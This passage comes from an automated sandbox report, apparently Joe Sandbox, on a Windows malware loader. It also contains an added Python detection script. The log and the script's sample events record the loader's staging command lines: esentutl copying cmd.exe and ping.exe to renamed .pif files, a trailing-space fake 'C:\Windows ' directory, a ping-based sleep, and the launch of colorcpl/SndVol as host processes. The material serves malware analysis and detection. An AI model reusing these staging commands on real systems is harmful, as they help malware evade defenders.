                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 11_2_0321AB9E OpenSCManagerW,OpenServiceW,CloseServiceHandle,ControlService,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle
                Source: C:\Users\user\Desktop\nft438A5fN.exe | File created: C:\Users\Public\Libraries\PNO
                Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4280
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4568:120:WilError_03
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2916:120:WilError_03
                Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess432
                Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1376
                Source: C:\Windows\SysWOW64\WerFault.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\24e0cc18-8175-4616-8ea9-89ad3c39c315
                Source: C:\Users\user\Desktop\nft438A5fN.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIF | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                Source: C:\Users\user\Desktop\nft438A5fN.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: nft438A5fN.exeReversingLabs: Detection: 57%
                Source: nft438A5fN.exeVirustotal: Detection: 68%
                Source: C:\Users\user\Desktop\nft438A5fN.exeFile read: C:\Users\user\Desktop\nft438A5fN.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\nft438A5fN.exe "C:\Users\user\Desktop\nft438A5fN.exe"
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\ovggtquW.cmd" "
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\nft438A5fN.exe /d C:\\Users\\Public\\Libraries\\Wuqtggvo.PIF /o
                Source: C:\Windows\SysWOW64\esentutl.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
                Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4280 -s 652
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
                Source: C:\Users\Public\alpha.pifProcess created: C:\Users\Public\xpha.pif C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
                Source: unknownProcess created: C:\Users\Public\Libraries\Wuqtggvo.PIF "C:\Users\Public\Libraries\Wuqtggvo.PIF"
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
                Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 432 -s 668
                Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4280 -s 660
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \"
                Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 432 -s 676
                Source: unknownProcess created: C:\Users\Public\Libraries\Wuqtggvo.PIF "C:\Users\Public\Libraries\Wuqtggvo.PIF"
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
                Source: C:\Windows\SysWOW64\SndVol.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1376 -s 608
                Source: C:\Windows\SysWOW64\SndVol.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1376 -s 624
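The process-creation entries above record the loader's whole staging chain in the clear. esentutl is driven in its copy mode (/y source /d destination /o) to duplicate cmd.exe to C:\Users\Public\alpha.pif, ping.exe to C:\Users\Public\xpha.pif and the sample itself to C:\Users\Public\Libraries\Wuqtggvo.PIF, so neither copy nor the real binary names appear in the batch file. The renamed cmd.exe then creates "C:\Windows " and "C:\Windows \SysWOW64" through the \\?\ prefix, which is the only way to get a trailing space into a directory name because the ordinary Win32 path parser strips it; the result is a directory that displays and sorts like the real system folder, and it is removed again with rmdir once it has served its purpose. The renamed ping.exe sends ten loopback echo requests as a roughly nine-second sleep, and colorcpl.exe and SndVol.exe are started with no arguments from the sample and from Wuqtggvo.PIF, with WerFault.exe subsequently invoked against those PIDs. The script below is an added triage example, not code from the report or from Joe Sandbox: it runs one heuristic per step over a constructed list of (image, parent image, command line) events modelled on the lines above, mixed with benign look-alikes that must stay silent. The event list, rule names and thresholds are this example's own assumptions, and the injection-host rule is keyed to the two GUI binaries seen in this report rather than to any general list.

```python
"""Triage of Windows process-creation events for the staging pattern recorded above.
Added example, not code from the report or from Joe Sandbox. SAMPLE_EVENTS is a
constructed (image, parent image, command line) list that mirrors the report's lines
plus a few benign look-alikes; rule names and thresholds are this example's own."""
import ntpath
import re
from typing import List, Optional, Tuple

SAMPLE_EVENTS: List[Tuple[str, str, str]] = [
    (r"C:\Windows\SysWOW64\cmd.exe", r"C:\Users\user\Desktop\nft438A5fN.exe",
     r'C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\ovggtquW.cmd" "'),
    (r"C:\Windows\SysWOW64\esentutl.exe", r"C:\Windows\SysWOW64\cmd.exe",
     r"C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o"),
    (r"C:\Windows\SysWOW64\esentutl.exe", r"C:\Windows\SysWOW64\cmd.exe",
     r"C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o"),
    (r"C:\Users\Public\alpha.pif", r"C:\Windows\SysWOW64\cmd.exe",
     r'C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "'),
    (r"C:\Users\Public\alpha.pif", r"C:\Windows\SysWOW64\cmd.exe",
     r'C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"'),
    (r"C:\Users\Public\xpha.pif", r"C:\Users\Public\alpha.pif",
     r"C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10"),
    (r"C:\Windows\SysWOW64\colorcpl.exe", r"C:\Users\Public\Libraries\Wuqtggvo.PIF",
     r"C:\Windows\System32\colorcpl.exe"),
    (r"C:\Users\Public\alpha.pif", r"C:\Windows\SysWOW64\cmd.exe",
     r'C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64'),  # unterminated quote, as in the report
    # Benign look-alikes (constructed) that the rules must ignore.
    (r"C:\Windows\System32\esentutl.exe", r"C:\Windows\System32\cmd.exe",
     r"esentutl.exe /p C:\Windows\NTDS\ntds.dit"),
    (r"C:\Windows\System32\PING.EXE", r"C:\Windows\System32\cmd.exe",
     r"ping -n 1 10.0.0.5"),
    (r"C:\Windows\System32\colorcpl.exe", r"C:\Windows\explorer.exe",
     r'"C:\Windows\System32\colorcpl.exe"'),
]

_TOKEN = re.compile(r'"([^"]*)"?|(\S+)')  # double-quoted (possibly unterminated) or bare argument
_ESENTUTL_COPY = re.compile(r"esentutl(?:\.exe)?\s+/y\s+(\S+)\s+/d\s+(\S+)", re.IGNORECASE)
INJECTION_HOSTS = {"colorcpl.exe", "sndvol.exe"}  # assumption: the two GUI hosts seen in this report
SUSPICIOUS_EXTS = {".pif", ".scr", ".com"}        # executable extensions that hide a renamed binary


def tokenize(cmdline: str) -> List[str]:
    """Split a Windows command line on whitespace, keeping quoted arguments whole."""
    return [quoted or bare for quoted, bare in _TOKEN.findall(cmdline)]


def norm_path(p: str) -> str:
    # Drop the extended-length prefix (backslash backslash ? backslash) and collapse doubled
    # backslashes; cmd.exe accepts both spellings, so rules compare the normalised form.
    if p.startswith("\\\\?\\"):
        p = p[4:]
    return re.sub(r"\\{2,}", r"\\", p)


def trailing_space_component(path: str) -> bool:
    # Win32 strips trailing spaces from path components, so a directory such as
    # "C:\Windows " can only be created through the extended-length prefix.
    return any(part.strip() and part != part.rstrip() for part in norm_path(path).split("\\"))


def esentutl_copy(cmdline: str) -> Optional[Tuple[str, str]]:
    """Return (source, destination) when the line uses esentutl's copy mode (/y src /d dst)."""
    m = _ESENTUTL_COPY.search(cmdline)
    return (norm_path(m.group(1)), norm_path(m.group(2))) if m else None


def ping_sleep_seconds(cmdline: str) -> Optional[int]:
    """Approximate delay of a loopback ping used as a sleep: -n N sends N requests about
    one second apart, so the process lives for roughly N-1 seconds."""
    low = cmdline.lower()
    if "127.0.0.1" not in low and "localhost" not in low:
        return None
    m = re.search(r"-n\s+(\d+)", low)
    return max(int(m.group(1)) - 1, 0) if m else None


def _ext(p: str) -> str:
    return ntpath.splitext(p)[1].lower()


def triage(events: List[Tuple[str, str, str]]) -> List[Tuple[int, str, str]]:
    """Return (event index, rule name, detail) for every rule that fires on an event."""
    findings = []
    for i, (image, parent, cmdline) in enumerate(events):
        tokens = tokenize(cmdline)
        copy = esentutl_copy(cmdline)
        # A LOLBin copy that changes the extension or lands under C:\Users is the staging step.
        if copy and (_ext(copy[0]) != _ext(copy[1]) or "\\users\\" in copy[1].lower()):
            findings.append((i, "lolbin_copy_esentutl", f"{copy[0]} -> {copy[1]}"))
        for tok in tokens:
            if trailing_space_component(tok):
                findings.append((i, "trailing_space_path", norm_path(tok)))
                break
        secs = ping_sleep_seconds(cmdline)
        if secs is not None and secs >= 3:  # threshold is an assumption; -n 1 or 2 is normal use
            findings.append((i, "ping_sleep", f"~{secs}s"))
        if _ext(image) in SUSPICIOUS_EXTS and "\\users\\" in image.lower():
            findings.append((i, "renamed_binary_in_user_dir", image))
        # A Control Panel / mixer applet started bare by a parent outside C:\Windows is a host candidate.
        if (ntpath.basename(image).lower() in INJECTION_HOSTS and len(tokens) == 1
                and not parent.lower().startswith("c:\\windows\\")):
            findings.append((i, "system_gui_binary_spawned_by_untrusted_parent", f"{parent} -> {image}"))
    return findings


if __name__ == "__main__":
    for idx, rule, detail in triage(SAMPLE_EVENTS):
        print(f"[{idx:2}] {rule:45} {detail}")
```

To use it on real telemetry, map Sysmon event 1 or EDR fields (Image, ParentImage, CommandLine) into the same tuples. The trailing-space rule carries the most signal on its own, since ordinary software has no reason to create such a directory; the ping and .pif rules are noisier and work best as corroboration for the same parent chain.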
                Source: C:\Users\user\Desktop\nft438A5fN.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\nft438A5fN.exe | Section loaded: version.dll
                Source: C:\Users\user\Desktop\nft438A5fN.exe | Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\nft438A5fN.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\nft438A5fN.exe | Section loaded: url.dll
                Source: C:\Users\user\Desktop\nft438A5fN.exe | Section loaded: ieframe.dll
                Source: C:\Users\user\Desktop\nft438A5fN.exe | Section loaded: iertutil.dll
                Source: C:\Users\user\Desktop\nft438A5fN.exe | Section loaded: netapi32.dll
                Source: C:\Users\user\Desktop\nft438A5fN.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\nft438A5fN.exe | Section loaded: winhttp.dll
                Source: C:\Users\user\Desktop\nft438A5fN.exe | Section loaded: wkscli.dll
                Source: C:\Users\user\Desktop\nft438A5fN.exe | Section loaded: netutils.dll
                Source: C:\Users\user\Desktop\nft438A5fN.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\nft438A5fN.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\nft438A5fN.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\nft438A5fN.exe | Section loaded: propsys.dll
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
